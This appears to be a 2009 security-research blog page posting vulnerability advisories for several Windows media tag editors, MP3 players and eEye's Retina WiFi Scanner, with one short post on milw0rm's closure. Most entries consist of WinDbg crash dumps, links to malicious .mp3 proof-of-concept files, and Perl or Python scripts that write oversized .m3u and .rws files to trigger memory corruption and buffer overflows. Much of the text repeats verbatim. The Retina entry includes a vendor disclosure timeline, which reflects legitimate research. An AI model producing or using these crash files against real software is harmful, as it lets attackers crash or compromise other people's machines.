# eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864
# eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for [path]\zmmspro.exe -
# zmmspro!ID3_FrameInfo::FieldFlags+0xdce:
# 005788fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
#
# ---------------------------------------------------------------------------
#
#
# [*] long playlist (.m3u file):
# ---------------------------------------------------------------------------
#
# (84.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
# 0:000> g
# (84.b98): Access violation - code c0000005 (!!! second chance !!!)
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
#
# ---------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 16.07.2009
#
#
# For first method, use folowing PoC file: #
# #
################################################################
# #
# - 1. http://zeroscience.org/codes/aimp2_evil.mp3 #
# #
# - 2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3 (mirror) #
# #
# - 3. http://securityreason.com/download/11/13 (mirror) #
# #
################################################################
# #
# #
# For second method, use folowing PoC code:
#
$fle = "Kung_PoW.m3u";
$mna = "A" x 800000;
print "\n\n[+] Creating playlist file: $fle ...\r\n";
sleep 1;
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
print m3u "$mna";
close (m3u);
print "\n[+] Playlist file successfully created!\r\n";
http://www.zeroscience.org/codes/zortam_studio.txt
#
#
# Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities
#
# Product web page: http://www.zortam.com
#
# Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from
# two different malicious files. The first method is thru a .mp3 file which
# has its ID3 tags filled with long strings. The second method is a .m3u list
# which is loaded in to the player resulting in memory corruption of the whole
# application including Dr.Watson crashing along with the app. For 1st method,
# you can click the Search Media for MP3's button and select the folder where
# the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load
# .m3u file into the MP3 Player..boom boom!
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# WinDbg:
#
# [*] overly long id3 tags (.mp3 file):
# ---------------------------------------------------------------------------
#
# (edc.f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864
# eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for [path]\zmmspro.exe -
# zmmspro!ID3_FrameInfo::FieldFlags+0xdce:
# 005788fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
#
# ---------------------------------------------------------------------------
#
#
# [*] long playlist (.m3u file):
# ---------------------------------------------------------------------------
#
# (84.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
# 0:000> g
# (84.b98): Access violation - code c0000005 (!!! second chance !!!)
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
#
# ---------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 16.07.2009
#
#
# For first method, use folowing PoC file: #
# #
################################################################
# #
# - 1. http://zeroscience.org/codes/aimp2_evil.mp3 #
# #
# - 2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3 (mirror) #
# #
# - 3. http://securityreason.com/download/11/13 (mirror) #
# #
################################################################
# #
# #
# For second method, use folowing PoC code:
#
$fle = "Kung_PoW.m3u";
$mna = "A" x 800000;
print "\n\n[+] Creating playlist file: $fle ...\r\n";
sleep 1;
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
print m3u "$mna";
close (m3u);
print "\n[+] Playlist file successfully created!\r\n";
http://www.zeroscience.org/codes/zortam_studio.txt
Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Vulnerability
#!/usr/bin/perl
#
# Title: Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Vulnerability
# Product Web Page: http://www.zortam.com
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
#
###===---
#
# (1c0.7f8): Integer divide-by-zero - code c0000094 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0000000d ebx=0019be80 ecx=00000000 edx=00000000 esi=0180f5dc edi=0000000a
# eip=0040f294 esp=0012f588 ebp=0180f570 iopl=0 nv up ei pl nz ac po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210212
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for zPlayer.exe -
# zPlayer+0xf294:
# 0040f294 f7f9 idiv eax,ecx
#
###===---
#
#
# Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.org
# 16.07.2009
#
$fle = "Kung_PoW.m3u";
$mna = "A" x 800000;
print "\n\n[+] Creating playlist file: $fle ...\r\n";
sleep 1;
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
print m3u "$mna";
close (m3u);
print "\n[+] Playlist file successfully created!\r\n";
http://www.zeroscience.org/codes/zortam_zero.txt
#
# Title: Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Vulnerability
# Product Web Page: http://www.zortam.com
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
#
###===---
#
# (1c0.7f8): Integer divide-by-zero - code c0000094 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0000000d ebx=0019be80 ecx=00000000 edx=00000000 esi=0180f5dc edi=0000000a
# eip=0040f294 esp=0012f588 ebp=0180f570 iopl=0 nv up ei pl nz ac po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210212
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for zPlayer.exe -
# zPlayer+0xf294:
# 0040f294 f7f9 idiv eax,ecx
#
###===---
#
#
# Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.org
# 16.07.2009
#
$fle = "Kung_PoW.m3u";
$mna = "A" x 800000;
print "\n\n[+] Creating playlist file: $fle ...\r\n";
sleep 1;
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
print m3u "$mna";
close (m3u);
print "\n[+] Playlist file successfully created!\r\n";
http://www.zeroscience.org/codes/zortam_zero.txt
Zortam ID3 Tag Editor 5.0 (mp3 file) Remote Stack Overflow Vulnerability
###################################################################################
Title: Zortam ID3 Tag Editor 5.0 (mp3 file) Remote Stack Overflow Vulnerability
Product Web Page: http://www.zortam.com/
Tested On: Microsoft Windows XP Professional SP3 (English)
Desc: Just download the PoC, and search for media or navigate with the vuln program
in the folder where the evil .mp3 file is located...boom.
Vulnerability Discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab (c) 2009
Macedonian Security Research & Development Laboratory
http://www.zeroscience.org/
16.07.2009
###################################################################################
1. PoC: http://zeroscience.org/codes/aimp2_evil.mp3
2. PoC: http://milw0rm.com/sploits/2009-aimp2_evil.mp3
3. PoC: http://securityreason.com/download/11/13
###################################################################################
###################################################################################
http://www.zeroscience.org/codes/zortam_bof.txt
Title: Zortam ID3 Tag Editor 5.0 (mp3 file) Remote Stack Overflow Vulnerability
Product Web Page: http://www.zortam.com/
Tested On: Microsoft Windows XP Professional SP3 (English)
Desc: Just download the PoC, and search for media or navigate with the vuln program
in the folder where the evil .mp3 file is located...boom.
Vulnerability Discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab (c) 2009
Macedonian Security Research & Development Laboratory
http://www.zeroscience.org/
16.07.2009
###################################################################################
1. PoC: http://zeroscience.org/codes/aimp2_evil.mp3
2. PoC: http://milw0rm.com/sploits/2009-aimp2_evil.mp3
3. PoC: http://securityreason.com/download/11/13
###################################################################################
###################################################################################
http://www.zeroscience.org/codes/zortam_bof.txt
14 July, 2009
Music Tag Editor 1.61 build 212 Remote Buffer Overflow PoC
==
* Music Tag Editor 1.61 build 212 Remote Buffer Overflow PoC *
Product: http://www.assistanttools.com/products/tag_editors/music_tag_editor/index.shtml
Tested On Microsoft Windows XP Professional SP3 (English)
Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.org/
15.07.2009
==
(8bc.86c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410041 ebx=00000000 ecx=0010fa80 edx=00410041 esi=001e5fb0 edi=000fd060
eip=cccccccc esp=000fcfa0 ebp=000fcff8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
cccccccc ??
==
*** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3
http://milw0rm.com/sploits/2009-aimp2_evil.mp3
** Note: The same PoC used in:
- http://secunia.com/advisories/35305/
- http://secunia.com/advisories/35295/
EOF
http://www.zeroscience.org/codes.html
* Music Tag Editor 1.61 build 212 Remote Buffer Overflow PoC *
Product: http://www.assistanttools.com/products/tag_editors/music_tag_editor/index.shtml
Tested On Microsoft Windows XP Professional SP3 (English)
Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.org/
15.07.2009
==
(8bc.86c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410041 ebx=00000000 ecx=0010fa80 edx=00410041 esi=001e5fb0 edi=000fd060
eip=cccccccc esp=000fcfa0 ebp=000fcff8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
cccccccc ??
==
*** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3
http://milw0rm.com/sploits/2009-aimp2_evil.mp3
** Note: The same PoC used in:
- http://secunia.com/advisories/35305/
- http://secunia.com/advisories/35295/
EOF
http://www.zeroscience.org/codes.html
09 July, 2009
Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#!/usr/bin/python
#
#
# * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#
#
# * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices.
# * Vendor: eEye Digital Security Inc.
# * Product Web Page: http://www.eeye.com/
# * Current Version: 1.0.8.68
# * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package.
# * Tested On Microsoft Windows XP Professional SP3 (English)
#
# * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# * liquidworm gmail com
# * http://www.zeroscience.org
# * 16.05.2009
#
# * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
#
#
# * --------------------------------windbg---------------------------------- *
#
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
# eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** Defaulted to export symbols for [path]\WiFiCore.dll -
# WiFiCore!LibWifi_ReportHTML+0x1b48e:
# 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=??
# 0:000> g
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
# eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# *** Defaulted to export symbols for [path]\kernel32.dll -
# kernel32!IsBadReadPtr+0x39:
# 7c809eda 8a02 mov al,byte ptr [edx] ds:0023:41414141=??
#
# * -------------------------------/windbg---------------------------------- *
#
#
# * Disclosure Timeline:
#
# * [16.05.2009] Vulnerability discovered.
# * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof
# of concept code.
# * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply
# from previous e-mail.
# * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in
# progress.
# * [25.05.2009] Vendor contacted for information on patch development and its release process
# because of our advisory disclosure policy.
# * [29.05.2009] Vendor contacted again for information on patch development because of no reply
# from previous e-mail.
# * [29.05.2009] Vendor answered. Bug fixes scheduled within next week.
# * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix
# time line information.
# * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed
# the QA. The fix will be introduced in the next release of the product. Scheduled
# date for the release of the update is not yet known...or...it's unknown :).
# * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release
# of the Retina package approximately on 29th of June.
# * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release.
# * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program
# * fixes. Vendor will contact me after the tests, with the results from the same.
# * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published
# * on 10th of july because of internal company reasons.
# * [09.07.2009] No reply from the vendor.
# * [10.07.2009] Public advisory released.
#
#
#
# * Pozdrav Do:
#
# * sm, thricer, drowsy, Jayji, Leon Juranic,
# * teppei, n3tpr0b3, DrunkY, apo, Aodrulez,
# * kokanin, e.wiZz!, j0rgan, str0ke, Uploader,
# * Jonathan Salwan, Sergio 'shadown' Alvarez,
# * Malformation, dz0, d3, Greg Linares, lio,
# * mio, drown, dni, Damjan, Maximiliano Soler,
# * leetgeek, Preddy, Gliser, eSDee i t.d. :)
#
#
# * Proof Of Concept:
#
#=========================================*snip*=========================================#
header = (
"\x52\x57\x53"
"\x30\x31\x30"
"\x19\x52\x76"
"\x00"
)
buffer = "\x41" * 1574624 #[Bytes/chars]
#1574622 No issues
#1574623 BoF, Access violation when reading [random]
#1574624 BoF, Access violation when reading [414141B1]
#...
payload = header + buffer
file = "Abulia.rws"
filetzio=open(file,'w')
filetzio.write(payload)
filetzio.close()
print "\n[+] File " + file + " successfully landed.\n"
#=========================================*snip*=========================================#
#################################################################################
# #
# * Disclaimer: #
# #
# * This document and all the information it contains are provided "as is", #
# * for educational purposes only, without warranty of any kind, whether #
# * express or implied. #
# #
# * The author reserves the right not to be responsible for the topicality, #
# * correctness, completeness or quality of the information provided in #
# * this document. Liability claims regarding damage caused by the use of #
# * any information provided, including any kind of information which is #
# * incomplete or incorrect, will therefore be rejected. #
# #
#################################################################################
http://zeroscience.org/codes/retinawifi_bof.txt
http://research.eeye.com/html/advisories/published/AD20090710.html
t00t!
08 July, 2009
The End of milw0rm.com
7th of July, 2009...str0ke stated:
"Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past. Be safe, /str0ke"
Thanks milw0rm.com for years given to the community.
"Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past. Be safe, /str0ke"
Thanks milw0rm.com for years given to the community.
02 July, 2009
Subscribe to:
Posts (Atom)